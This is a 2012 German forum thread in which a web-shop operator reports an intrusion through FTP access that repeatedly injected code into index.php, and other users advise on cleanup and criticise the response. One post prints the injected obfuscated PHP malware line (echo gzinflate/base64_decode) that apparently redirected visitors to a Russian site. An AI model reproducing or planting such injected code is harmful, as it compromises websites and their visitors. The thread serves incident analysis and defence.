Markus B Posted April 14, 2012 Report Share Posted April 14, 2012 Hallo zusammen, wir haben (hatten??) einen Hackerangriff auf unseren Shop. Der Hacker hatte so wie es momentan aussieht Zugriffsrechte auf dem FTP Server, aber anscheinend keine Adminrechte. (Oder er macht seit Gestern Pause?) Ständig hat er Code in die index.php eingefügt, die dann nicht mehr funktioniert hat. Ich habe rausgefunden das es eine Art Weiterleitung auf eine Russische Seite war. Hat halt nie funktioniert weil die index.php sich selber überprüft und weils nicht mehr stimmte ausgestiegen ist. Meine Momentane Lösung (seit Gestern läufts) war der Index.php sämtliche Schreibrechte zu nehmen. Die hat nur noch Leserechte! Wie geschrieben seit Gestern läufts wieder! Link to comment Share on other sites More sharing options...
Matthias Posted April 14, 2012 Report Share Posted April 14, 2012 Prüf alle Datein mit index, login etc im Namen sowohl php als auch html Link to comment Share on other sites More sharing options...
Markus B Posted April 14, 2012 Author Report Share Posted April 14, 2012 Prüf alle Datein mit index, login etc im Namen sowohl php als auch html Ich habe auf die schnelle nur aufs Datum geschaut. Weil da würde es auffallen! Ansonsten habe ich die DB nach dem String durchsucht und nichts gefunden. Link to comment Share on other sites More sharing options...
df:bug Posted April 14, 2012 Report Share Posted April 14, 2012 Hallo, was wurde dabei eingefügt? Viele Grüße, Stefan Link to comment Share on other sites More sharing options...
Markus B Posted April 14, 2012 Author Report Share Posted April 14, 2012 Zeile 9 in der index.php #d93065# echo(gzinflate(base64_decode("tVVLj5swEP4t5RJoRIoNfiDWPXRPPfeIOESEZGeVDSnQRKto/3vHYyeb7JJ0VWkFRmPP+JvXZ3zX1x1sh++1SWNWgIlZzKZ1ActwO+/65udmCIMkmAYMB8eRBpExRqfR0D0ffrTtuplvwqgMtl07tMPztgmq2e+Xej7UD2GzavarfhEdEG0Pm0W7ny3a+s9TsxmipSknccrADilAcog1JCATUAxEDkqBzEEyULgiAZ+UZhI4Lmsrn+uVAC5BM8gyEMoap5oEskkgRlBtodEBWuEUFxigTYqSTiHmCo7xvMakslcQlBO0ZfmFrRY2cBuNtkGggNMxvKuJqdxCoz87o1gxx2QkgJg82JUcOOUgM8odXw4Mtfh4D6hToLmVnZOMRFIzEsk7U0CbLRC3iNZHTr5ddJn3lGOpnBqXpCtP6v2/tVCUima+TU6tNKUo7FeQLLVPGi2ZwyW39qXqYKUxKBuuOJZH0DSx9lgW4Xy52itfP3aiB6cMsRuEJGkrPy1gTJzbQquRUqMGuzDa7LOp5L6SIr+ILtbX6TNCDUXJoN7uo3PAXaWvUkY4yjDaR1mPHgqi/QiPmMsMl6XnrO2iOHIp8z06lZRwTtRDOfsc8l1EdU4h+Q/6nE7DGwbFtxCvUMthXWPXLcRz2jkUfTuCIyXHjT/YlsvTemyOP43/Afj+fI9hfvz39nn/bUn050QhwkMbDMvTgM5PYpMfOcaTqkyqWb9dwxBOYBIVOxM0eLvt5vhZB8UL3li7qDHu1ip3VbE3y6I3ZVV05tfQwWZVLNsuLIQUXwwUMDUsOjyi1Jt+2pXBEnE6HO3TPX4f5la+bxd4O4b78rH6yqZZEpGbJmrCPiruvvmL+C8="))); #/d93065# Link to comment Share on other sites More sharing options...
Markus B Posted April 14, 2012 Author Report Share Posted April 14, 2012 Ich habe das am MacBook mal am localhost ausprobiert. Safari bringt ne Warnmeldung und zeigt die URL an. Link to comment Share on other sites More sharing options...
df:bug Posted April 14, 2012 Report Share Posted April 14, 2012 Hallo, es handelt sich dabei um Malware/Trojaner. Nun musst du schauen, wie der Zugriff möglich war/ist. Laufen noch weitere Installationen in der Shop-Installation, wie z.B. Wordpress, PhpMyAdmin, MySQLDumper etc.? Edit: Zusätzlich noch alle Passwörter ändern. Viele Grüße, Stefan Link to comment Share on other sites More sharing options...
Markus B Posted April 15, 2012 Author Report Share Posted April 15, 2012 Hallo, es handelt sich dabei um Malware/Trojaner. Nun musst du schauen, wie der Zugriff möglich war/ist. Laufen noch weitere Installationen in der Shop-Installation, wie z.B. Wordpress, PhpMyAdmin, MySQLDumper etc.? Edit: Zusätzlich noch alle Passwörter ändern. Viele Grüße, Stefan Na das habe ich auch gemerkt! :-) Ja ich gebe alles immer an die Technik des Servers weiter, mal abwarten was die noch finden? OK, bei dem Shop laufen noch andere Sachen mit. Aber: Das einzige was greifbar wäre wäre eine aktuelle Wordpress Installation. Der rest ist per htacces nochmals geschützt. Und für phpmyadmin brauchste dann wieder ein Login! Also doppelt gemoppelt. Ich habe die DB gechecked, aber die ist sauber. Hm? Sehe gerade das die es weiterhin versuchen, aber anscheinend auf der deaktivierten index.php Seite. Gespeichert heute morgen 5:22 Uhr! Das war sicher keiner von uns. Anscheinend klappt das mit den reinen Leserechten auf die index.php noch! Das würde bedeutet das die Hacker nur Zugriff mit dem FTP User haben! Link to comment Share on other sites More sharing options...
Fry Posted April 15, 2012 Report Share Posted April 15, 2012 ...würde bedeutet das die Hacker nur Zugriff mit dem FTP User haben! ...und stellen fleissig illegales Zugs wie Kinderpornos, Filme und Musikdateien und ähnliches online... Der rest ist per htacces nochmals geschützt! Kann der FTP-User ja nicht ändern, löschen, manipulieren, das geht ja gar nicht^^ Hat bei euch denn noch niemnd daran gedacht, zumindest allen FTP-Usern erst einmal die Rechte zu entziehen oder wenigstens die Passwörter zu ändern und so ganz nebenbei einmal alle anderen Passwörter zu ändern??? Der index.php lediglich die Rechte zu entziehen ist so ziemlich der blödeste Einfall, vor allem wenn jemand FTP-Zugriff hat, diese Rechte werden im allgemeinen durch eben diese User wieder zugeteilt. Link to comment Share on other sites More sharing options...
Markus B Posted April 15, 2012 Author Report Share Posted April 15, 2012 ...und stellen fleissig illegales Zugs wie Kinderpornos, Filme und Musikdateien und ähnliches online... Kann der FTP-User ja nicht ändern, löschen, manipulieren, das geht ja gar nicht^^ Hat bei euch denn noch niemnd daran gedacht, zumindest allen FTP-Usern erst einmal die Rechte zu entziehen oder wenigstens die Passwörter zu ändern und so ganz nebenbei einmal alle anderen Passwörter zu ändern??? Der index.php lediglich die Rechte zu entziehen ist so ziemlich der blödeste Einfall, vor allem wenn jemand FTP-Zugriff hat, diese Rechte werden im allgemeinen durch eben diese User wieder zugeteilt. Wir haben alles überprüft. Es ist bisher nichts mehr gefunden worden. Hab ich Dir irgendwas getan? Wir haben die PW natürlich geändert, aber wir wollten erst sehen was der alles kann. Sprich auf was der so zugreift. Wir haben den nun auch eindeutig im Logfile identifiziert und können das gezielt überwachen. Wir sind ja auch keine Anfänger. Irgendwie musste wir das mal eingrenzen um herauszufinden wie und vor allem mit welchen rechten da gearbeitet wird. Das hat Super geklappt. Also wars kein blöder Einfall! Es war ne gute Idee. Seitdem Wissen wir mehrere Dinge die vorher unklar waren! Die ganze Aktion war auf diesem Wege erfolgreich. Link to comment Share on other sites More sharing options...
Fry Posted April 15, 2012 Report Share Posted April 15, 2012 Nein, was solltest du mir getan haben?? Sollte mein Beitrag so rübergekommen sein: SORRY, war keine Absicht! Ich war nur erstaunt über so eine, ich sage mal riesengrosse!! Fahrlässigkeit nur die index.php mit anderen Schreibrechten zu versehen, zeugt entweder von enormen Wissensdefiziten oder von einem prall gefülltem Geldbeutel, denn auch wenn ihr/du nur wissen wolltet, was der kann, seid ihr im Umkehrschluss die dummen (z.B. besagte Kinderpornos), wenn du verstehst was ich damit sagen will, für die Legislative, Exekutive und Judikative ist der Betreiber verantwortlich! Wenn man als verantwortungsbewusster Admin so einen Fall nachvollziehen will, dann nicht auf einem produktiv laufendem Server, da heisst es sichern, herunterfahren, analysieren, beheben, neumachen. Niemand gibt einem 10-jährigen (der Hacker) die Autoschlüssel, nur um zu sehen was der kann, und wenn doch: der Schaden bleibt an dem (in diesem Falle ihr) haften, nicht an dem 10-jährigen;) Link to comment Share on other sites More sharing options...
Recommended Posts
Archived
This topic is now archived and is closed to further replies.